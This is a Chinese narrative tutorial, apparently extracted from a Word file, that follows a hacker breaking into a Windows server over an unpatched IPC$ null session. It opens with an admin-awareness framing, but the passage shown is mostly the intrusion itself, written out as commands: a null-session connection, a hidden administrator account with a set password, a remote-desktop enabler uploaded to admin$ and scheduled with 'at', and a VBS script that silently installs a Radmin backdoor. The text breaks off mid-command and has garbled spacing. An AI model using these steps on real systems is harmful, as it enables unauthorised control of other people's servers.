小黑小白对抗记.docxVIP

精品文档 精品文档 PAGE PAGE6 精品文档 PAGE 小黑小白对抗记 从本文你将学到 √黑客常见入侵方式 √如何避免空连接漏洞 √如何从日志发现木马藏身地 小黑:一个水平中等的“黑客”，曾拜师于一名高手，所以水平有所长进，最近正想找一台机器练手。 小白:刚刚上任不到三天的网管，进入网络安全行业不久，安全水平和发现隐患的意识还需要提高。这次的攻击事件其 实并不是黑客水平有多高，而是由于网络安全意识不足，一 个N年前的老漏洞没进行修补导致了服务器被攻击。反思一下，上任的几天里一直忙碌着升级、打补丁;但是忽略了服务器默认的一些系统漏洞和日志的保护，让黑客钻了空子。国 内很多网络管理人员都容易出现这种错误。本文就是提醒各位网络管理员，除了给系统打补丁外，还需要掌握基本的检测技术和保护系统日志才能保证服务器的安全运行。 23:25觅食――入侵检测 晚上11点，某大虾黑客的徒弟小黑打开 “IPC$空连接扫 描器”，想看看今天是否能中奖找到一台不设防的服务器。 时间慢慢的流逝，深夜中传来一声“YEAH！”，哈哈，居然真的还有这么原始漏洞的主机！小黑兴奋地敲击着键盘开始了入侵工作。 小提示:什么是IPC$空连接 IPC$(InternetProcessConnection)是共享命名管道的资源， 它是为了让进程间通信而开放的命名管道，可以通过验证用 户名和密码获得相应的权限，在远程管理计算机和查看计算 机的共享资源时使用。利用 IPC$，连接者甚至可以与目标主 机建立一个空的连接而无需用户名与密码(当然对方机器必须开了ipc$共享)，而利用这个空的连接，连接者还可以得到目标主机上的用户列表，从而开始入侵主机。 23:30挂上诱饵――建立 IPC$空连接 小黑打开本地的 cmd.exe命令行，输入 netuse \\202.99.10.*\ipc$/usE: 尝试连接对方服务器， 连接成功！ 输入:netview\\202.99.10.* 发现C$D$E$admin$都默认开 启着，原来是台新服务器啊！怪不得，小黑嘴里手上都不清闲。我要完全控制这台服务器！ 23:45垂钓――远程控制 IPC$空连接这个漏洞不可能一直存在，先弄个远程管理 员好了――屏幕中的命令行下出现了一段命令 : netuserxiaohei$hacker/add netlocalgroupadministratorsxiaohei/add 恩，这样子就拥有了管理名为 xiaohei$密码为hacker 的高级管理员了，以后就可以通过 Windows自带的“免杀控 制器”:“远程桌面连接”控制服务器了！ 来试验一下，打 开本地开始菜单→所有程序→附件→通讯→远程桌面连接， 在空白地方输入控制服务器的 IP地址:202.99.10.*。“是放个 木马上去呢还是添加一个 FTP账号呢？”小黑脑子中闪现着 无数恶毒的后门。正在这时音响中“嘣”的一声，错误提示 : 无法连接到远程计算机（见图 1）！ 图1 居然未开启远程服务端口了，难不倒我！继续在命令行 下输入:copyC:\3389.exe\\202.99.10.*\admin$，将小黑本地的远程登录服务开启上传到202.99.10.*的服务器上。 nettime\\202.99.10.* ，查看远程服务器的系统时间为下 面的入侵收集资料，现在时间是凌晨 2:10分，at\\202.99.10.* 02:183389.exe，利用at命令在远程计算机的 2:18分执行 3389.exe文件，开启远程控制 (需要自动重新启动计算机 )。 小提示:远程桌面为什么“免杀”？ 远程桌面本是微软公司为了方便网管维护服务器而推出的一项服务，用来连接到开启了远程桌面控制功能的计算机，但是已经被很多黑客用来控制电脑。由于是系统自带服务，也不会受到杀毒软件的查杀。 凌晨2:35上钩――种植木马 为了保险起见，还是再增加一个木马后门程序控制，小 黑阴险地笑着祭出了 radmin影子版，由于此软件属于管理工 具，一般杀毒软件都不对其设防，所以修改后成了最安全的 隐形后门。 小黑配制好木马后写了一段VBS代码使木马程序可以自动执行: setws=wscript.createobject(“wscript.shell”) ws.run“regedit.exe/sr_server.reg”，0 ws.run“regedit.exe/sqidong.reg”，0 ws.run“r_server.exe/install/silence”，0 ws.run“r_server.exe/start”，0 将木马程序打包成 muma.exe自解压文档，选择运行后 自动执行VBS内容，将木马上传到系统盘下，继续利用 :at \\202.99.10.*02:15mu